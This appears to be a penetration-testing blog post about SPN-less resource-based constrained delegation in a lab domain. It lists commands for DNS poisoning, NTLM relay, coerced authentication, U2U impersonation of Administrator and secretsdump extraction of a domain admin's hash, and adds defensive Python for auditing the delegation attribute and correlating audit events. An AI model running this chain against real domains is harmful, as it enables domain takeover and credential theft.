Today’s prelude to a tale of pentest pwnage talks about something called “SPN-less RBCD” (resource-based constrained delegation). Here are the key steps:

Let’s use my tangent.town lab as an example and say that TT-DC02 is where WebDAV is enabled.

Add a DNS record that points to your testing box (I think this is required so the victim systems consider you to be in the “Trusted Zone”):

dnstool.py -u 'tangent\7MinSec' -p 'MySuperSecurePassword' -r ROGUE-DNS-RECORD -a add -t A -d IP.OF.ATTACKING.BOX IP.OF.A.DOMAIN-CONTROLLER

Set up the relay to TT-DC02:

ntlmrelayx.py -smb2support -t ldaps://tt-dc02.tangent.town --delegate-access --escalate-user 7minsec

Coerce TT-DC01 to auth to your Kali box:

coercer coerce -u 7MinSec -p 'MySuperSecurePassword' -t TT-DC01 -l ROGUE-DNS-RECORD --auth-type http

If it worked, your ntlmrelayx window should say something like “7minsec can now impersonate users on TT-DC01$ via S4U2Proxy”.
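What the relay actually changed is the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on TT-DC01’s computer object: ntlmrelayx’s --delegate-access writes a security descriptor whose DACL grants the escalated account the right to delegate to that computer. The parser below is an added example for auditing that attribute from the blue side; it is not code from the original post or from impacket. The sample descriptor (SAMPLE_SD) and the SID S-1-5-21-1111-2222-3333-1105 in it are constructed, and the approved-SID list passed to unexpected_delegators is a hypothetical allowlist an auditor would maintain.

```python
import base64
import struct

# Constructed sample input (not captured from a real directory): a self-relative
# security descriptor holding one ACCESS_ALLOWED ACE that grants full control
# (mask 0x000F01FF) to the constructed SID S-1-5-21-1111-2222-3333-1105.
SAMPLE_SD = bytes.fromhex(
    "01000480" "00000000" "00000000" "00000000" "14000000"  # SD header: rev 1, control 0x8004, DACL at 20
    "04002c00" "01000000"                                   # ACL header: rev 4, size 44, 1 ACE
    "00002400" "ff010f00"                                   # ACE header: ACCESS_ALLOWED, size 36, mask
    "0105000000000005"                                      # SID: rev 1, 5 sub-authorities, authority 5
    "15000000" "57040000" "ae080000" "050d0000" "51040000"  # 21-1111-2222-3333-1105 (little-endian)
)


def parse_sid(buf, off):
    """Decode a binary SID at buf[off]; returns (SID string, byte length)."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def parse_allowed_to_act(raw):
    """Return the ACCESS_ALLOWED entries of msDS-AllowedToActOnBehalfOfOtherIdentity.

    Accepts the raw bytes or the base64 string LDAP tools print for binary
    attributes. Each entry is a SID that may delegate to the computer and the
    access mask it was granted."""
    if isinstance(raw, str):
        raw = base64.b64decode(raw)
    rev, _sbz1, control, _owner, _group, _sacl, dacl_off = struct.unpack_from("<BBHIIII", raw, 0)
    if rev != 1 or not control & 0x0004 or dacl_off == 0:  # SE_DACL_PRESENT must be set
        return []
    _arev, _asbz, _asize, ace_count, _asbz2 = struct.unpack_from("<BBHHH", raw, dacl_off)
    off, entries = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size, mask = struct.unpack_from("<BBHI", raw, off)
        if ace_type == 0x00:  # ACCESS_ALLOWED_ACE_TYPE; object ACEs (0x05) carry extra fields and are skipped
            sid, _ = parse_sid(raw, off + 8)
            entries.append({"sid": sid, "mask": mask})
        off += ace_size
    return entries


def unexpected_delegators(raw, approved_sids):
    """SIDs allowed to delegate to this computer that are not on the approved list."""
    return sorted(e["sid"] for e in parse_allowed_to_act(raw) if e["sid"] not in approved_sids)


if __name__ == "__main__":
    for entry in parse_allowed_to_act(SAMPLE_SD):
        print("%s may delegate (mask 0x%08X)" % (entry["sid"], entry["mask"]))
    print("unexpected:", unexpected_delegators(SAMPLE_SD, {"S-1-5-21-1111-2222-3333-9999"}))
```

Run this over the attribute value of every computer object (domain controllers first): on a healthy domain the attribute is usually empty, so any SID at all is worth a look, and a user SID rather than a service account is exactly the relay outcome described above.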

Then I followed https://medium.com/@offsecdeer/a-practical-guide-to-rbcd-exploitation-a3f1a47267d5 to perform SPN-less RBCD:

getTGT.py -hashes :$(pypykatz crypto nt 'MySuperSecurePassword') tangent.town/7minsec

Take note of the session key from this command:

describeTicket.py 7minsec.ccache | grep 'Ticket Session Key'

Change the account password:

smbpasswd.py -newhashes :TICKET-SESSION-KEY-GOES-HERE tangent.town/7minsec:MySuperSecurePassword@tt-dc01.tangent.town

Perform U2U:

KRB5CCNAME=7minsec.ccache getST.py -u2u -impersonate Administrator -spn host/tt-dc01 -k -no-pass tangent.town/7minsec

Profit! In this example, stealing a domain admin (Tommy’s) hash:

KRB5CCNAME='tt-dc01$@host_tt-dc01@TANGENT.TOWN.ccache' secretsdump.py -k -no-pass @tt-dc01 -just-dc-user tommy
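Each stage of the SPN-less chain above leaves its own audit record: the relay writes the RBCD attribute on the computer object (Event ID 5136 when directory service change auditing is on), the smbpasswd.py step is a password change on a plain user account (4723, or 4724 for a reset by someone else), and the U2U S4U2Proxy request shows up as a 4769 whose Transited Services field names a user account instead of a service. The script below is an added example of correlating those three into one alert; it is not code from the original post or from any product. The EVENTS list is constructed to model those Windows Security/Directory Service fields and is not captured from a real domain, and the one-hour window is an assumed tuning value.

```python
import re
from datetime import datetime, timedelta

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"

# Constructed sample events modelled on Windows audit fields (not real captures).
EVENTS = [
    # Benign: helpdesk edits a description attribute.
    {"EventID": 5136, "TimeCreated": "2024-05-01T09:00:00", "SubjectUserName": "helpdesk",
     "ObjectDN": "CN=WS07,OU=Workstations,DC=tangent,DC=town",
     "AttributeLDAPDisplayName": "description", "AttributeValue": "loaner laptop"},
    # Relay signature: the computer account writes its own RBCD attribute.
    {"EventID": 5136, "TimeCreated": "2024-05-01T10:00:00", "SubjectUserName": "TT-DC01$",
     "ObjectDN": "CN=TT-DC01,OU=Domain Controllers,DC=tangent,DC=town",
     "AttributeLDAPDisplayName": RBCD_ATTR,
     "AttributeValue": "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1111-2222-3333-1105)"},
    # The delegating user changes its own password shortly afterwards.
    {"EventID": 4723, "TimeCreated": "2024-05-01T10:05:00",
     "SubjectUserName": "7minsec", "TargetUserName": "7minsec"},
    # Benign service ticket: no transited services.
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:06:00", "TargetUserName": "tommy@TANGENT.TOWN",
     "ServiceName": "TT-FS01$", "TransitedServices": "-"},
    # S4U2Proxy where the "service" in the delegation chain is a user account.
    {"EventID": 4769, "TimeCreated": "2024-05-01T10:07:00",
     "TargetUserName": "Administrator@TANGENT.TOWN", "ServiceName": "TT-DC01$",
     "TransitedServices": "7minsec@TANGENT.TOWN"},
]


def _account(name):
    """Normalise 'user@REALM', 'DOMAIN\\user' or 'HOST$' to a bare upper-case name."""
    return name.split("@")[0].split("\\")[-1].rstrip("$").upper()


def _computer_from_dn(dn):
    m = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1).upper() if m else ""


def _ts(e):
    return datetime.fromisoformat(e["TimeCreated"])


def rbcd_writes(events):
    """5136 events touching the RBCD attribute; self_write flags the relay
    signature of a computer account writing the attribute on its own object."""
    out = []
    for e in events:
        if e["EventID"] == 5136 and e["AttributeLDAPDisplayName"] == RBCD_ATTR:
            comp = _computer_from_dn(e["ObjectDN"])
            out.append({"time": _ts(e), "computer": comp, "subject": e["SubjectUserName"],
                        "self_write": _account(e["SubjectUserName"]) == comp,
                        "granted_sids": re.findall(r"S-1-5-[\d-]+", e.get("AttributeValue", ""))})
    return out


def user_s4u2proxy(events):
    """4769 events whose TransitedServices names a user (non-$) account, i.e.
    constrained delegation performed by something that is not a service."""
    out = []
    for e in events:
        transited = e.get("TransitedServices", "-")
        if e["EventID"] != 4769 or transited in ("", "-"):
            continue
        users = [t for t in transited.split(",") if not t.split("@")[0].endswith("$")]
        if users:
            out.append({"time": _ts(e), "delegator": _account(users[0]),
                        "impersonated": e["TargetUserName"], "service": _account(e["ServiceName"])})
    return out


def correlate(events, window=timedelta(hours=1)):
    """Chain: RBCD write on computer C, then a password change of user U, then an
    S4U2Proxy ticket for C with U in TransitedServices, all inside the window."""
    pw_changes = [(_ts(e), _account(e["TargetUserName"])) for e in events
                  if e["EventID"] in (4723, 4724) and not e["TargetUserName"].endswith("$")]
    alerts = []
    for w in rbcd_writes(events):
        deadline = w["time"] + window
        for pw_time, user in pw_changes:
            if not w["time"] <= pw_time <= deadline:
                continue
            for s in user_s4u2proxy(events):
                if s["delegator"] == user and s["service"] == w["computer"] and pw_time <= s["time"] <= deadline:
                    alerts.append({"computer": w["computer"], "user": user, "self_write": w["self_write"],
                                   "impersonated": s["impersonated"], "granted_sids": w["granted_sids"]})
    return alerts


if __name__ == "__main__":
    for a in correlate(EVENTS):
        print("ALERT: %(user)s delegated to %(computer)s as %(impersonated)s "
              "(computer wrote its own RBCD attribute: %(self_write)s)" % a)
```

The two building blocks are useful on their own as well: a self_write in rbcd_writes is suspicious without any follow-up, because a computer account has no business granting delegation rights on itself, and user_s4u2proxy fires on the defining feature of the SPN-less technique, a user account appearing where a service should be in the delegation chain.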

Written by: Brian Johnson
